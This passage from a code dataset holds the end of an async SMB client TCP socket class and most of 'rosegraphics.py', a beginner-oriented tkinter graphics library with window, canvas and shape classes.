except asyncio.CancelledError:
#the SMB connection is terminating
return
except Exception as e:
logger.exception('[TCPSocket] handle_outgoing %s' % str(e))
await self.disconnect()
#async def connect(self, settings): #not needed parameter because we have networkselector now...
async def connect(self):
"""
Main function to be called, connects to the target specified in settings, and starts reading/writing.
"""
#self.settings = settings
try:
con = asyncio.open_connection(self.settings.get_ip(), self.settings.get_port())
try:
self.reader, self.writer = await asyncio.wait_for(con, int(self.settings.timeout))
except asyncio.TimeoutError:
logger.debug('[TCPSocket] Connection timeout')
raise SMBConnectionTimeoutException('[TCPSocket] Connection timeout')
except ConnectionRefusedError:
logger.debug('[TCPSocket] Connection refused')
raise SMBConnectionRefusedException('[TCPSocket] Connection refused')
except asyncio.CancelledError:
#the SMB connection is terminating
raise asyncio.CancelledError
except Exception as e:
logger.debug('[TCPSocket] connect generic exception')
raise e
self.incoming_task = asyncio.create_task(self.handle_incoming())
self.outgoing_task = asyncio.create_task(self.handle_outgoing())
return True, None
except Exception as e:
try:
self.writer.close()
except:
pass
return False, e
| [
"[email protected]"
] | |
c61c925a0e0f9a7e7cfb8f89789e3bb008228a43 | f55ea1cfc520e6e2ceda961e7400fe2de0ad4e69 | /src/rosegraphics.py | c2138ca1fdd9002c0686a7fb42372f18f779db0e | [
"MIT"
] | permissive | chenx16/05b-Exam1Practice | 231081cc1284ccdd27b1da57cd19bc656a648eb1 | 82dbe6a5677732820f32dbb8264c04a028a1a459 | refs/heads/master | 2020-04-09T20:15:08.721532 | 2018-12-12T19:01:54 | 2018-12-12T19:01:54 | 160,568,393 | 0 | 0 | null | 2018-12-05T19:31:56 | 2018-12-05T19:31:56 | null | UTF-8 | Python | false | false | 65,517 | py | """
rosegraphics.py - a simple Graphics library for Python.
Its key feature is:
-- USING this library provides a simple introduction to USING objects.
Other key features include:
-- It has a rich set of classes, methods and instance variables.
-- In addition to classes like Circles that are natural for
students, it has other kinds of classes like RoseWindow
and FortuneTeller to provide a richer set of examples
than "just" a graphics library.
-- It allows one to do a reasonable set of graphics operations
with reasonable efficiency. The API mimics Java's Shape API
for the most part.
-- It is built on top of tkinter and its extension ttk
(the standard graphics libraries that come with Python).
-- Unlike tkinter, it is NOT event-driven and hence can be used
before students see that paradigm. (There is a behind-the-scenes
facilty for listening for and responding to events,
for those who want to do so.)
-- It attempts to be as bullet-proof as possible, to make it easy
for beginners to use it. In particular, it attempts to provide
reasonable error messages when a student misuses the API.
-- It was inspired by zellegraphics but is a complete re-implemenation
that attempts to:
-- Be more bullet-proof.
-- Provide a richer set of examples for using objects.
-- Have an API that is more like Java's Shape API than tkinter's
(older) API.
-- While it can serve as an example for defining classes,
it is NOT intended to do so for beginners.
It is excellent for helping students learn to USE objects;
it is NOT perfect for helping students learn to WRITE CLASSES.
See the MAIN function below for typical examples of its use.
Authors: David Mutchler, Mark Hays, Michael Wollowswki, Matt Boutell,
Chandan Rupakheti, Claude Anderson and their colleagues,
with thanks to John Zelle for inspiration and hints.
First completed version: September 2014.
"""
# FIXME (errors):
# -- clone() does not really make a copy; it just makes a new one
# but without cloning all the attributes.
# -- _ShapeWithCenter claims that things like Ellipse are subclasses,
# but they are not at this point, I think. In general, need to
# deal with overlap between _ShapeWithCenter and _RectangularShape.
# KEEP both of them to have some classes have corner_1 and corner_2
# while others have center and ...
# FIXME (things that have yet to be implemented):
# -- Allow multiple canvasses.
# -- Better close_on ... ala zellegraphics.
# -- Keyboard.
# -- Better Mouse.
# -- Add type hints.
# -- Catch all Exceptions and react appropriately.
# -- Implement unimplemented classes.
# -- Add and allow FortuneTellers and other non-canvas classes.
import tkinter
from tkinter import font as tkinter_font
import time
import turtle
# ----------------------------------------------------------------------
# All the windows that are constructed during a run share the single
# _master_Tk (a tkinter.Tk object)
# as their common root. The first construction of a RoseWindow
# sets this _master_Tk to a Tkinter.Tk object.
# ----------------------------------------------------------------------
_master_Tk = None
# ----------------------------------------------------------------------
# At the risk of not being Pythonic, we provide a simple type-checking
# facility that attempts to provide meaningful error messages to
# students when they pass arguments that are not of the expected type.
# ----------------------------------------------------------------------
class WrongTypeException(Exception):
""" Not yet implemented. """
pass
def check_types(pairs):
""" Not yet implemented fully. """
for pair in pairs:
value = pair[0]
expected_type = pair[1]
if not isinstance(value, expected_type):
raise WrongTypeException(pair)
# ----------------------------------------------------------------------
# Serialization facility
# ----------------------------------------------------------------------
def _serialize_shapes(self):
"""Returns a list of strings representing the shapes in sorted order."""
# Idea: dump all the stats on all shapes, return a sorted list for easy comparison.
# Problem: the order in which keys appear in dictionaries is random!
# Solution: sort keys and manually print
shapes = [shape.__dict__ for shape in self.initial_canvas.shapes]
keys_by_shape = [sorted(shape) for shape in shapes]
for k in range(len(shapes)):
shapes[k]['_method_for_drawing'] = None
shapes[k]['shape_id_by_canvas'] = None
result = []
for k in range(len(keys_by_shape)):
shape = shapes[k]
result.append([])
for key in keys_by_shape[k]:
result[-1].append(str(key) + ":" + str(shape[key]))
result[-1] = str(result[-1])
return "\n".join(sorted(result))
# ----------------------------------------------------------------------
# RoseWindow is the top-level object.
# It starts with a single RoseCanvas.
# ----------------------------------------------------------------------
class RoseWindow(object):
"""
A RoseWindow is a window that pops up when constructed.
It can have RoseWidgets on it and starts by default with
a single RoseCanvas upon which one can draw shapes.
To construct a RoseWindow, use:
- rg.RoseWindow()
or use any of its optional arguments, as in these examples:
window = rg.RoseWindow(400, 300) # 400 wide by 300 tall
window = rg.RoseWindow(400, 300, 'Funny window') # with a title
Instance variables include:
width: width of this window (in pixels)
height: width of this window (in pixels)
title: displayed on the window's bar
widgets: the things attached to this window
"""
def __init__(self, width=400, height=300, title='Rose Graphics',
color='black', canvas_color=None,
make_initial_canvas=True):
"""
Pops up a tkinter.Toplevel window with (by default)
a RoseCanvas (and associated tkinter.Canvas) on it.
Arguments are:
-- width, height: dimensions of the window (in pixels).
-- title: title displayed on the windoww.
-- color: background color of the window
-- canvas_color: background color of the canvas
displayed on the window by default
-- make_initial_canvas:
-- If True, a default canvas is placed on the window.
-- Otherwise, no default canvas is placed on the window.
If this is the first RoseWindow constructed, then a
hidden Tk object is constructed to control the event loop.
Preconditions:
:type width: int
:type height: int
:type title: str
:type color: Color
:type canvas_color: Color
:type make_initial_canvas: bool
"""
# check_types([(width, (int, float)),
# (height, (int, float)),
# (title, (Color, str)
# --------------------------------------------------------------
# The _master_Tk controls the mainloop for ALL the RoseWindows.
# If this is the first RoseWindow constructed in this run,
# then construct the _master_Tk object.
# --------------------------------------------------------------
global _master_Tk
if not _master_Tk:
_master_Tk = tkinter.Tk()
_master_Tk.withdraw()
else:
time.sleep(0.1) # Helps the window appear on TOP of Eclipse
# --------------------------------------------------------------
# Has a tkinter.Toplevel, and a tkinter.Canvas on the Toplevel.
# --------------------------------------------------------------
self.toplevel = tkinter.Toplevel(_master_Tk,
background=color,
width=width, height=height)
self.toplevel.title(title)
self._is_closed = False
self.toplevel.protocol("WM_DELETE_WINDOW", self.close)
# FIXME: The next two need to be properties to have
# setting happen correctly. Really belongs to RoseCanvas.
# See comments elsewhere on this.
self.width = width
self.height = height
if make_initial_canvas:
self.initial_canvas = RoseCanvas(self, width, height,
canvas_color)
else:
self.initial_canvas = None
self.widgets = [self.initial_canvas]
# FIXME: Do any other tailoring of the toplevel as desired,
# e.g. borderwidth and style...
# --------------------------------------------------------------
# Catch mouse clicks and key presses.
# --------------------------------------------------------------
self.mouse = Mouse()
self.keyboard = Keyboard()
self.toplevel.bind('<Button>', self._on_mouse_click)
self.toplevel.bind('<KeyPress>', self._on_key_press)
self.update()
def close(self):
""" Closes this RoseWindow. """
if self.toplevel:
self.toplevel.destroy()
self.toplevel = None
self.update()
self._is_closed = True
def update(self):
"""
Checks for and handles events that has happened
in this RoseWindow (e.g. mouse clicks, drawing shapes).
"""
global _master_Tk
_master_Tk.update()
def render(self, seconds_to_pause=None):
"""
Updates all the Shapes attached to RoseCanvas objects associated with this RoseWindow, then draws all those Shapes.
After doing so, pauses the given number of seconds.
:type seconds_to_pause: float
"""
for widget in self.widgets:
if type(widget) == RoseCanvas:
widget.render()
self.update()
if seconds_to_pause:
time.sleep(seconds_to_pause)
def close_on_mouse_click(self):
"""
Displays a message at the bottom center of the window and waits for the user to click the mouse anywhere in the window.
Then closes this RoseWindow.
Returns an rg.Point that specifies where the user clicked the mouse.
"""
message = 'To exit, click anywhere in this window'
click_position = self.continue_on_mouse_click(message=message,
close_it=True)
return click_position
def continue_on_mouse_click(self,
message='To continue, click anywhere in this window',
x_position=None,
y_position=None,
close_it=False,
erase_it=True):
"""
Displays a message at the bottom center of the window and waits for the user to click the mouse, then erases the message.
Optional parameters let you:
-- Display a different message
-- Place the message at a different place in the window (xpos and ypos are as in Text)
-- Close the window after the mouse is clicked (and ignore the GraphicsError that results if the user instead chooses to click the X in the window)
-- NOT erase the message when done
"""
if self._is_closed:
return
if x_position is None:
x_position = self.width / 2
if y_position is None:
y_position = self.height - 20
anchor_point = Point(x_position, y_position)
text = Text(anchor_point, message)
# FIXME: Really should do all this on a per-RoseCanvas basis.
if self.initial_canvas:
text.attach_to(self.initial_canvas)
self.initial_canvas._renderShape(text, render_NOW=True)
click_position = self.get_next_mouse_click()
if erase_it and self.initial_canvas:
text.detach_from(self.initial_canvas)
if close_it:
self.close() # then close the window
return click_position
def get_next_mouse_click(self):
"""
Waits for the user to click in the window.
Then returns the rg.Point that represents the point where the user clicked.
Example:
If this method is called and then the user clicks near the upper-right corner of a 300 x 500 window,
this function would return something like rg.Point(295, 5).
"""
self.mouse.position = None
while True:
if self._is_closed:
return None
if self.mouse.position is not None:
break
self.update()
time.sleep(.05) # allow time for other events to be handled
click_point = self.mouse.position
self.mouse.position = None
return click_point
def _on_mouse_click(self, event):
self.mouse._update(event)
def _on_key_press(self, event):
self.keyboard._update(event)
# def add_canvas(self, width=None, height=None, background_color=0):
# FIXME: Set defaults based on the main canvas.
# new_canvas = RoseCanvas(self, background_color='white')
# self.widgets.append(new_canvas)
#
# _root.update()
def __serialize_shapes(self):
"""Returns a list of strings representing the shapes in sorted order."""
return _serialize_shapes(self)
class RoseWidget():
"""
A Widget is a thing that one can put on a Window,
e.g. a Canvas, FortuneTeller, etc.
"""
def __init__(self, window):
self._window = window
def get_window(self):
return self._window
class RoseCanvas(RoseWidget):
defaults = {'colors': [None, 'yellow', 'light blue', 'dark grey']}
count = 0
"""
A RoseCanvas is a RoseWidget (i.e., a thing on a RoseWindow)
upon which one can draw shapes and other Drawable things.
"""
def __init__(self, window, width=200, height=200,
background_color=0):
super().__init__(window)
RoseCanvas.count = RoseCanvas.count + 1
# FIXME: Deal with default background colors.
# FIXME: Store background color as a property
# so that modifying it changes the tkinter canvas.
# Ditto width and height.
# if background_color == 0:
# index = RoseCanvas.count % len(defaults['colors'])
# self.background_color = defaults['colors'][index]
# else:
# self.background_color = background_color
tk_canvas = tkinter.Canvas(window.toplevel,
width=width, height=height,
background=background_color)
self._tkinter_canvas = tk_canvas
# FIXME: Automate gridding better.
self._tkinter_canvas.grid(padx=5, pady=5)
self.shapes = []
def render(self, seconds_to_pause=None):
"""
Updates all the Shapes attached to this RoseCanvas, then draws all those Shapes.
After doing so, pauses the given number of seconds.
:type seconds_to_pause: float
"""
self._update_shapes()
self._window.update()
if seconds_to_pause:
time.sleep(seconds_to_pause)
def _renderShape(self, shape, render_NOW=False):
"""Renders a shape."""
coordinates = shape._get_coordinates_for_drawing()
options = shape._get_options_for_drawing()
if shape.shape_id_by_canvas[self] is None:
shape.shape_id_by_canvas[self] = \
shape._method_for_drawing(self._tkinter_canvas, *coordinates)
try:
self._tkinter_canvas.coords(shape.shape_id_by_canvas[self],
*coordinates)
except tkinter.TclError:
msg = 'Could not place the shape\n'
msg += 'on the given window.\n'
msg += 'Did you accidentally close a window\n'
msg += 'that later needed to be rendered again?'
raise Exception(msg) from None
self._tkinter_canvas.itemconfigure(shape.shape_id_by_canvas[self],
options)
if render_NOW:
# redraw NOW
self._window.update()
def _draw(self, shape):
"""Queues a shape for being drawn. Does NOT draw it just yet."""
shapeInList = False
for listShape in self.shapes:
if listShape is shape:
shapeInList = True
break
if not shapeInList:
shape.shape_id_by_canvas[self] = None
self.shapes.append(shape)
def _undraw(self, shape):
if shape in self.shapes:
for i in range(len(self.shapes)):
if self.shapes[i] is shape:
self._tkinter_canvas.delete(shape.shape_id_by_canvas[self])
del self.shapes[i]
break
def _update_shapes(self):
for shape in self.shapes:
self._renderShape(shape)
class Mouse(object):
def __init__(self):
self.position = None
def _update(self, event):
self.position = Point(event.x, event.y)
class Keyboard(object):
def __init__(self):
self.key_pressed = None
def _update(self, event):
pass
class __FreezeClass__ (type):
"""Prevents class variable assignment."""
def __setattr__(self, name, _ignored): # last parameter is the value
err = "You tried to set the instance variable '" + name + "'\n"
err += " on the CLASS '" + self.__name__ + "'"
err += ", which is not an OBJECT.\n"
err += " Did you forget the () after the word "
err += self.__name__ + ",\n"
err += " on the line where you constructed the object?"
raise SyntaxError(err)
class _Shape(object, metaclass=__FreezeClass__):
"""
A Shape is a thing that can be drawn on a RoseCanvas
(which itself draws on a tkinter Canvas).
Its constructor provides the tkinter method to be used to
draw this Shape.
This abstract type has concrete subclasses that include:
Arc, Bitmap, Circle, Ellipse, Image, Line, Path, Polygon,
Rectangle, RoundedRectangle, Square, Text and Window.
Public data attributes: None.
Public methods: attach_to.
"""
def __init__(self, method_for_drawing):
""" Arguments:
-- the tkinter method for drawing the Shape.
"""
self._method_for_drawing = method_for_drawing
self.shape_id_by_canvas = {}
def __eq__(self, other):
"""
Two Shape objects are equal (==) if all their attributes
are equal to each other.
"""
# check before we go deleting keys that may or may not exist
if(not isinstance(other, self.__class__)):
return False
self_dict = self.__dict__.copy()
other_dict = other.__dict__.copy()
del self_dict["shape_id_by_canvas"]
del other_dict["shape_id_by_canvas"]
return (self_dict == other_dict)
def __ne__(self, other):
return not self.__eq__(other)
def attach_to(self, window_or_canvas):
"""
'draws' this Shape. More precisely:
Attaches this Shape to the given
RoseWindow or RoseCanvas. When that
RoseWindow/RoseCanvas is rendered, this shape
will appear on that RoseWindow/RoseCanvas.
"""
if isinstance(window_or_canvas, RoseWindow):
window_or_canvas = window_or_canvas.initial_canvas
window_or_canvas._draw(self)
def detach_from(self, rose_canvas):
"""
'undraws' this Shape. More precisely:
Detaches this Shape from the given
RoseWindow or RoseCanvas. When that
RoseWindow/RoseCanvas is rendered,
this shape will no longer appear
on that RoseWindow/RoseCanvas.
"""
if type(rose_canvas) == RoseWindow:
rose_canvas = rose_canvas.initial_canvas
rose_canvas._undraw(self)
class _ShapeWithOutline(object):
"""
A Shape that has an interior (which can be filled with a color)
and an outline (which has a color and thickness).
This abstract type has concrete subclasses that include:
Arc, Circle, Ellipse, Image, Line, Path,
Polygon, Rectangle, Square, Text and Window.
Public data attributes: fill_color, outline_color, outline_thickness.
Public methods: _initialize_options.
"""
defaults = {'fill_color': None,
'outline_color': 'black',
'outline_thickness': 1}
def _initialize_options(self):
self.fill_color = _ShapeWithOutline.defaults['fill_color']
self.outline_color = _ShapeWithOutline.defaults['outline_color']
self.outline_thickness = _ShapeWithOutline.defaults[
'outline_thickness']
def _get_options_for_drawing(self):
options = {'fill': self.fill_color,
'outline': self.outline_color,
'width': self.outline_thickness}
# If a color is None, that means transparent here:
for option in ('fill', 'outline'):
if not options[option]:
options[option] = ''
return options
class _ShapeWithThickness(object):
"""
A Shape that can be (and almost always is) filled with a color
and has a thickness but no outline.
This abstract type has concrete subclasses that include:
Line and Path.
Public data attributes: color, thickness.
Public methods: _initialize_options.
"""
defaults = {'color': 'black',
'thickness': 1,
'arrow': None}
def _initialize_options(self):
self.color = _ShapeWithThickness.defaults['color']
self.thickness = _ShapeWithThickness.defaults['thickness']
self.arrow = _ShapeWithThickness.defaults['arrow']
def _get_options_for_drawing(self):
options = {'fill': self.color,
'width': self.thickness,
'arrow': self.arrow}
# If a color is None, that means 'black' here:
if options['fill'] is None:
options['fill'] = 'black'
return options
class _ShapeWithText(object):
"""
A Shape that has text and a font for displaying that text.
This abstract type has concrete subclasses that include:
Text.
Public data attributes: font_family, font_size,
is_bold, is_italic, is_underline, is_overstrike.
Public methods: _initialize_options.
"""
# FIXME: Add more to the above docstring.
defaults = {'font_family': 'helvetica',
'font_size': 14,
'weight': 'normal',
'slant': 'roman',
'underline': 0,
'overstrike': 0,
'justify': tkinter.CENTER,
'text_box_width': None,
'text_color': 'black',
'text': ''}
def _initialize_options(self):
self.font_family = _ShapeWithText.defaults['font_family']
self.font_size = _ShapeWithText.defaults['font_size']
self.is_bold = _ShapeWithText.defaults['weight'] == 'bold'
self.is_italic = _ShapeWithText.defaults['slant'] == 'italic'
self.is_underline = _ShapeWithText.defaults['underline'] == 1
self.is_overstrike = _ShapeWithText.defaults['overstrike'] == 1
self.justify = _ShapeWithText.defaults['justify']
self.text_box_width = _ShapeWithText.defaults['text_box_width']
self.text_color = _ShapeWithText.defaults['text_color']
self.text = _ShapeWithText.defaults['text']
def _get_options_for_drawing(self):
weight = 'bold' if self.is_bold else 'normal'
slant = 'italic' if self.is_italic else 'roman'
underline = 1 if self.is_underline else 0
overstrike = 1 if self.is_overstrike else 0
font = tkinter_font.Font(family=self.font_family,
size=self.font_size,
weight=weight,
slant=slant,
underline=underline,
overstrike=overstrike)
options = {'font': font,
'justify': self.justify,
'fill': self.text_color,
'text': self.text}
if self.text_box_width:
options['width'] = self.text_box_width
return options
class _ShapeWithCenter(_Shape):
"""
A Shape that has a center (and for which moving its center
moves the entire Shape). Its constructor provides the center
of the Shape along with its method for drawing this Shape.
This abstract type has concrete subclasses that include:
Arc, Bitmap, Circle, Ellipse, Image,
Rectangle, RoundedRectangle, Square, Text and Window.
Public data attributes: center.
Public methods: move_by, move_center_to.
"""
def __init__(self, center, method_for_drawing):
"""
Arguments:
-- the Point that is the center of the Shape
(the Shape stores a CLONE of that Point)
-- the tkinter method for drawing the Shape.
"""
# Clone the center argument, so that if the caller
# mutates the argument, it does NOT affect this Shape.
super().__init__(method_for_drawing)
self.center = center.clone()
def move_by(self, dx, dy):
"""
Moves this _Shape to the right by dx and down by dy.
Negative values move it to the left/up instead.
Does NOT return a value; instead, it mutates this shape.
:type dx: float
:type dy: float
"""
self.center.move_by(dx, dy)
def move_center_to(self, x, y):
"""
Moves this _Shape's center to (x, y),
thus translating the entire Shape
by however much its center moved.
:type x: float
:type y: float
"""
self.center.move_to(x, y)
class _RectangularShape(_Shape):
"""
A _Shape determined by its rectangular bounding box (plus possibly
other information).
Concrete sub-classes include: rg.Ellipse, rg.Rectangle.
Examples:
These all assume that the variable shape is a _RectangularShape
(e.g. an rg.Ellipse or a rg.Rectangle):
The methods in these examples all return rg.Point objects that are
copies of a corner/center of the _RectangularShape:
ul = shape.get_upper_left_corner()
ur = shape.get_upper_right_corner()
ll = shape.get_lower_left_corner()
lr = shape.get_lower_right_corner()
center = shape.get_center()
The methods in these examples return a positive number:
h = shape.get_height()
w = shape.get_width()
The method in this example returns an rg.Rectangle that encloses
this _RectangularShape:
bbox = shape.get_bounding_box()
This example moves this _RectangularShape right 100 and up 50:
shape.move_by(100, -50)
This example does the same thing another way:
shape.corner_1 = shape.corner_1 + 100
shape.corner_2 = shape.corner_2 - 50
"""
def __init__(self, corner_1, corner_2, method_for_drawing):
"""
:type corner_1: Point
:type corner_2: Point
:type method_for_drawing: callable(int, int, int, int) -> int
"""
super().__init__(method_for_drawing)
self.corner_1 = corner_1.clone()
self.corner_2 = corner_2.clone()
self._update_corners()
def __repr__(self):
""" Returns a string representation of this shape. """
f_string = ''
f_string += '{}: corner_1=({}, {}), corner_2=({}, {}),'
f_string += ' fill_color={},'
f_string += ' outline_color={}, outline_thickness={}.'
return f_string.format(self.__class__.__name__,
self.corner_1.x, self.corner_1.y,
self.corner_2.x, self.corner_2.y,
self.fill_color, self.outline_color,
self.outline_thickness)
def move_by(self, dx, dy):
"""
Moves this _Shape to the right by dx and down by dy.
Negative values move it to the left/up instead.
Does NOT return a value; instead, it mutates this shape.
:type dx: float
:type dy: float
"""
self.corner_1.x += dx
self.corner_1.y += dy
self.corner_2.x += dx
self.corner_2.y += dy
def clone(self):
"""
Returns a copy of this _RectangularShape.
"""
return self.__class__(self.corner_1.clone(),
self.corner_2.clone())
def get_upper_left_corner(self):
"""
Returns a copy of the ** upper-left **
corner of this _RectanglarShape.
The returned value is an rg.Point.
"""
self._update_corners()
return self._upper_left_corner
def get_lower_left_corner(self):
"""
Returns a copy of the ** lower-left **
corner of this _RectanglarShape.
The returned value is an rg.Point.
"""
self._update_corners()
return self._lower_left_corner
def get_upper_right_corner(self):
"""
Returns a copy of the ** upper-right **
corner of this _RectanglarShape.
The returned value is an rg.Point.
"""
self._update_corners()
return self._upper_right_corner
def get_lower_right_corner(self):
"""
Returns a copy of the ** lower-right **
corner of this _RectanglarShape.
The returned value is an rg.Point.
"""
self._update_corners()
return self._lower_right_corner
def get_center(self):
"""
Returns a copy of the ** center ** of this _RectanglarShape.
The returned value is an rg.Point.
"""
return Point((self.corner_1.x + self.corner_2.x) / 2,
(self.corner_1.y + self.corner_2.y) / 2)
def get_height(self):
"""
Returns the height (i.e., the size in
the y-direction) of this _RectangularShape.
The returned value is always positive.
"""
return abs(self.corner_1.y - self.corner_2.y)
def get_width(self):
"""
Returns the width (i.e., the size in
the x-direction) of this _RectangularShape.
The returned value is always positive.
"""
return abs(self.corner_1.x - self.corner_2.x)
def get_bounding_box(self):
"""
Returns an rg.Rectangle that encloses this _RectangularShape.
"""
return Rectangle(self.corner_1, self.corner_2)
def _update_corners(self):
min_x = min(self.corner_1.x, self.corner_2.x)
min_y = min(self.corner_1.y, self.corner_2.y)
max_x = max(self.corner_1.x, self.corner_2.x)
max_y = max(self.corner_1.y, self.corner_2.y)
self._upper_left_corner = Point(min_x, min_y)
self._upper_right_corner = Point(max_x, min_y)
self._lower_left_corner = Point(min_x, max_y)
self._lower_right_corner = Point(max_x, max_y)
def _get_coordinates_for_drawing(self):
return [self.get_upper_left_corner().x,
self.get_upper_left_corner().y,
self.get_lower_right_corner().x,
self.get_lower_right_corner().y]
class Arc(_RectangularShape, _ShapeWithOutline):
""" Not yet implemented. """
class Bitmap(_Shape):
""" Not yet implemented. """
class Circle(_ShapeWithCenter, _ShapeWithOutline):
"""
A Shape that is an circle.
To construct a Circle, use:
- rg.Circle(center, radius)
where center is an rg.Point object
and radius is a positive integer.
For example:
- rg.Circle(rg.Point(100, 75), 30)
specifies the circle whose center
is at (100, 75) and whose radius is 30.
Instance variables include:
center: An rg.Point that specifies
the center of the Circle.
radius: The radius of the Circle.
fill_color:
The Circle is filled with this color.
Example: circle.fill_color = 'green'
outline_color:
The outline of the Circle is this color.
Example: circle.outline_color = 'blue'
outline_thickness: The thickness (in pixels)
of the outline of the Circle.
Examples:
circle = rg.Circle(rg.Point(100, 75), 30)
print(circle.center, circle.radius)
circle.fill_color = 'blue'
circle.outline_color = 'black'
circle.outline_thickness = 5
window = rg.RoseWindow()
circle.attach_to(window)
circle.move_center_to(300, 200)
circle.move_by(-50, 60)
# Another way to move the Circle:
x = circle.center.x
y = circle.center.y
circle.center = rg.Point(x - 50, y + 60)
"""
def __init__(self, center, radius):
"""
:type center: rg.Point
:type radius: int
"""
# The following sets instance variable
# self.center
# to a clone (copy) of the given rg.Point.
super().__init__(center, tkinter.Canvas.create_oval)
# The following sets default values for:
# self.fill_color
# self.outline_color
# self.outline_thickness
super()._initialize_options()
# The radius is also stored in an instance variable:
self.radius = radius
def __repr__(self):
""" Returns a string representation of this Circle. """
f_string = ''
f_string += 'Circle: center=({}, {}), radius={}, fill_color={}, '
f_string += 'outline_color={}, outline_thickness={}.'
return f_string.format(self.center.x, self.center.y,
self.radius,
self.fill_color, self.outline_color,
self.outline_thickness)
def clone(self):
""" Returns a copy of this Circle. """
return Circle(self.center, self.radius)
def get_bounding_box(self):
"""
Returns an rg.Rectangle that encloses this Circle.
"""
c1 = Point(self.center.x - self.radius,
self.center.y - self.radius)
c2 = Point(self.center.x + self.radius,
self.center.y + self.radius)
return Rectangle(c1, c2)
def _get_coordinates_for_drawing(self):
return self.get_bounding_box()._get_coordinates_for_drawing()
class Ellipse(_RectangularShape, _ShapeWithOutline):
"""
A Shape that is an ellipse (aka oval).
To construct an Ellipse, use:
- rg.Ellipse(corner1, corner2)
where corner1 and corner2 are
rg.Point objects that specify opposite
corners of the imaginery rectangle that
encloses the Ellipse.
For example:
- rg.Ellipse(rg.Point(100, 50),
- rg.Point(300, 200))
specifies the ellipse whose imaginery
rectangle that encloses the ellipse:
- has upper-left corner (100, 50) and
- lower-right corner(300, 200).
Another example:
- rg.Ellipse(rg.Point(300, 50),
- rg.Point(100, 200))
specifies the same ellipse.
Any two opposite corners can be used.
Instance variables include:
corner_1: An rg.Point that specifies
one corner of the imaginery rectangle
that encloses the Ellipse.
corner_2: An rg.Point that specifies an
opposite corner of the imaginery rectangle
that encloses the Ellipse.
fill_color:
The Ellipse is filled with this color.
Example: ellipse.fill_color = 'green'
outline_color:
The outline of the Ellipse is this color.
Example: ellipse.outline_color = 'blue'
outline_thickness: The thickness (in pixels)
of the outline of the Ellipse.
Examples:
p1 = rg.Point(100, 50)
p2 = rg.Point(300, 200)
ellipse = rg.Rectangle(p1, p2)
print(ellipse.corner_1, ellipse.corner_2)
ellipse.fill_color = 'blue'
ellipse.outline_color = 'black'
ellipse.outline_thickness = 5
window = rg.RoseWindow()
ellipse.attach_to(window)
ellipse.move_to(300, 200)
ellipse.move_by(-50, 60)
# Another way to move the Ellipse:
ellipse.corner_1 = rect.corner_1 - 50
ellipse.corner_2 = rect.corner_2 + 60
# To get rg.Points for the corners/center:
ul = ellipse.get_upper_left_corner()
ur = ellipse.get_upper_right_corner()
ll = ellipse.get_lower_left_corner()
lr = ellipse.get_lower_right_corner()
center = ellipse.get_center()
# To get the width/height (always positive):
h = ellipse.get_height()
w = ellipse.get_width()
"""
def __init__(self, corner_1, corner_2):
"""
:type corner_1: rg.Point
:type corner_2: rg.Point
"""
# The following sets instance variables
# self.corner_1
# self.corner_2
# to clones (copies) of the given rg.Points.
super().__init__(corner_1, corner_2,
tkinter.Canvas.create_oval)
# The following sets default values for:
# self.fill_color
# self.outline_color
# self.outline_thickness
super()._initialize_options()
class Line(_Shape, _ShapeWithThickness):
"""
A Shape that is a line segment.
To construct a Line, use:
- rg.Line(start, end)
where start and end are rg.Point objects
that specify the endpoints of the Line.
For example:
- rg.Line(rg.Point(100, 50),
- rg.Point(200, 30)
specifies the Line that starts at (100, 50)
and ends at (200, 30).
Another example:
- rg.Line(rg.Point(200, 30),
- rg.Point(100, 50)
specifies the Line that is the same as the
previous example except that the start and
end points are reversed. This is important
if the Line's "arrow" type is not None.
Instance variables include:
start:
The rg.Point that is one end of the Line.
end:
The rg.Point that is the other end of the Line.
color: The Line is drawn with this color.
thickness: The thickness (in pixels) of the Line.
arrow: Specifies whether or not the Line
is drawn as an arrow. Possible values are:
- None draw the Line without arrow-heads
- 'first' draw an arrow-head at the start
- 'last' draw an arrow-head at the end
- 'both' draw an arrow-head at both
For example, if my_line is a Line, then
- my_line.arrow = 'last'
makes the Line be drawn as an arrow
from its start point to its end point.
Examples:
start = rg.Point(100, 50)
end = rg.Point(200, 30)
line = rg.Line(start, end)
line.color = 'blue'
line.thickness = 3
line.arrow = 'both' # A double-sided arrow
line.arrow = None # Just a line (no arrow)
line.arrow = 'first' # Arrow from end to start
line.arrow = 'last' # Arrow from start to end
window = rg.RoseWindow()
line.attach_to(window)
line.move_by(-50, 60)
"""
def __init__(self, start, end):
"""
:type start: rg.Point
:type end: rg.Point
"""
super().__init__(tkinter.Canvas.create_line)
# The following sets default values for:
# self.color
# self.thickness
# self.arrow
super()._initialize_options()
# The other instance variables are the endpoints:
self.start = start.clone()
self.end = end.clone()
def __repr__(self):
""" Returns a string representation of this Line. """
f_string = ''
f_string += 'Line: start=({}, {}), end=({}, {}), color={}, '
f_string += 'thickness={}, arrow={}.'
return f_string.format(self.start.x, self.start.y,
self.end.x, self.end.y,
self.color, self.thickness, self.arrow)
def clone(self):
""" Returns a copy of this Line. """
return Line(self.start, self.end)
def move_by(self, dx, dy):
"""
Moves both endpoints of this Line
(and hence the entire Line as well)
to the right by dx and down by dy.
Negative values move it to the left/up instead.
Does NOT return a value; instead, it mutates this Line.
:type dx: float
:type dy: float
"""
self.start.move_by(dx, dy)
self.end.move_by(dx, dy)
def get_midpoint(self):
"""
Returns an rg.Point at the midpoint (center) of this Line.
"""
return Point((self.start.x + self.end.x) / 2,
(self.start.y + self.end.y) / 2)
def _get_coordinates_for_drawing(self):
return [self.start.x,
self.start.y,
self.end.x,
self.end.y]
class Path(_Shape, _ShapeWithThickness):
""" Not yet implemented. """
class Point(_Shape, _ShapeWithOutline):
"""
A Shape that is a point in two-dimensional space.
It is drawn as a small circle (dot).
To construct a Point, use:
- rg.Point(x, y)
where x and y are the Point's coordinates.
For example:
- rg.Point(100, 50)
specifies the point whose x value is 100
and whose y value is 50.
Instance variables include the following:
x: The x-coordinate of the Point.
y: The y-coordinate of the Point.
fill_color:
The Point is filled with this color.
Note that a Point is drawn as a small, filled
circle, which is why it has a fill_color, etc.
Example: p.fill_color = 'green'
outline_color:
The outline of the Point is this color.
Example: p.outline_color = 'blue'
outline_thickness: The thickness (in pixels)
of the outline of the Point.
Examples:
p = rg.Point(100, 50)
print(p.x, p.y)
window = rg.RoseWindow()
p.attach_to(window)
p.move_to(300, 200)
p.move_by(-50, 60)
# Another way to move the Point:
p.x = p.x - 50
p.y = p.y + 60
p.fill_color = 'blue'
p.outline_color = 'black'
p.outline_thickness = 1
"""
defaults = {'width_for_drawing': 5,
'height_for_drawing': 5,
